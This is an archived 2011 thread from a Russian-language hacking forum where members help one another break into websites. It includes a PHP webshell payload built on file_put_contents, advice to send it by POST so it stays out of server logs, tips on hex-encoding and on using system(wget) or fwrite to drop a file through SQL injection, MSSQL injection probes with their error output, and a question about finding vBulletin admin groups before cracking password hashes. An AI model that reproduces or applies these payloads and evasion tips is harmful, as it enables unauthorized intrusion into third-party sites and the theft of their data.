ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.07.2011, 23:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
34360
Репутация:
1
|
|
Сообщение от попугай
попугай said:
ну мог бы по аналогии fileputcontens заюзать
1=&2=shell.php&cmd=file_put_contents($_GET[1],$_GET[2]);
также можно вариации с методом POST использовать, чтоб в логах не следить, да и изначально писать не просто eval($_GET[CMD]), а что-нибудь поудобнее, например аплоадер файлов.
file_put_contents - пробовал, безрезультатно.
Так я лью через скулю, файл с таким кодом я хотел залить
Но увы )); почему-то не приняло. Может в бейс закодить?
|
|
|
|
30.07.2011, 00:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Apokalepsys
Apokalepsys said:
Здравствуйте. Помигите пожалуйста.
Допустим сайт вида http://sait.com/tut-tekst/i-tut.html
возможно ли проверсти SQL иьекцию при таком виде ссылки если да то как. Какие еще можно провести атаки при таком виде ссылки чтобы получить доступ к базе данных
читай про .htaccess. Не знаешь элементарного - нех лезть
|
|
|
|
30.07.2011, 00:38
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Слабо знаком с SQL-иньекциями в MSSQL.
http://www.site.com/internal.asp?ProdID=124335'
Сообщение от None
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.
http://www.site.com/internal.asp?ProdID=124335--
Все в порядке, т.е. никаких кавычек и скобок закрывать не нужно, верно?
http://www.site.com/internal.asp?ProdID=124335+AND+1=1--
Сообщение от None
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'AND'.
http://www.site.com/internal.asp?ProdID=124335+OR+1=@@version--
Сообщение от None
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near the keyword 'OR'.
Что я делаю не так? |
|
|
30.07.2011, 01:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
2Nek1t прочитай тут про "Все о MSSQL инъекциях."
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
|
|
|
|
30.07.2011, 01:53
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Читал, и не только там.
В общем, даже не важно, MSSQL или MySQL. Такая банальная вещь, как id=123+AND+1=1-- (или подобная) должна была сработать, но не вышло. Поэтому и спрашиваю, может нюанс какой-то не улавливаю?
|
|
|
|
30.07.2011, 10:19
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от Nek1t
Nek1t said:
Читал, и не только там.
В общем, даже не важно, MSSQL или MySQL. Такая банальная вещь, как id=123+AND+1=1-- (или подобная) должна была сработать, но не вышло. Поэтому и спрашиваю, может нюанс какой-то не улавливаю?
все нюансы можно понять только увидев линк, т.к. каждый пример индивидуален и не имеет шаблонных решений (в большинстве своём)
|
|
|
|
30.07.2011, 11:33
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от plaeer
plaeer said:
file_put_contents - пробовал, безрезультатно.
Так я лью через скулю, файл с таким кодом я хотел залить
Но увы )); почему-то не приняло. Может в бейс закодить?
проверь версию php - file_put_contents толькой с пятой. Если действительно чеетвертая, то вариантов все равно масса - код аплоадера сунь, или через fwrite(fopen) или system(wget), или еще что-нибудь придумай.
Кавычки убери или закодь, но не в бейс, а в хекс.
|
|
|
|
30.07.2011, 13:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
34360
Репутация:
1
|
|
Сообщение от попугай
попугай said:
проверь версию php - file_put_contents толькой с пятой. Если действительно чеетвертая, то вариантов все равно масса - код аплоадера сунь, или через fwrite(fopen) или system(wget), или еще что-нибудь придумай.
Кавычки убери или закодь, но не в бейс, а в хекс.
PHP/5.2.5
Каким образом в хекс кодировать?
|
|
|
|
30.07.2011, 13:13
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от plaeer
plaeer said:
PHP/5.2.5
Каким образом в хекс кодировать?
или просто в консоли MySQL, select hex ('string'); (не забудь в начале добавить 0x)
|
|
|
|
31.07.2011, 16:26
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 10
Провел на форуме:
42585
Репутация:
0
|
|
есть форум на vbulletin, можно ли какнибудь посмотреть(до расшифровки хешей), какие группы могут входить в админ панель?Точнее так, в какой таблице хранятся группы которые могут входить в админку
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
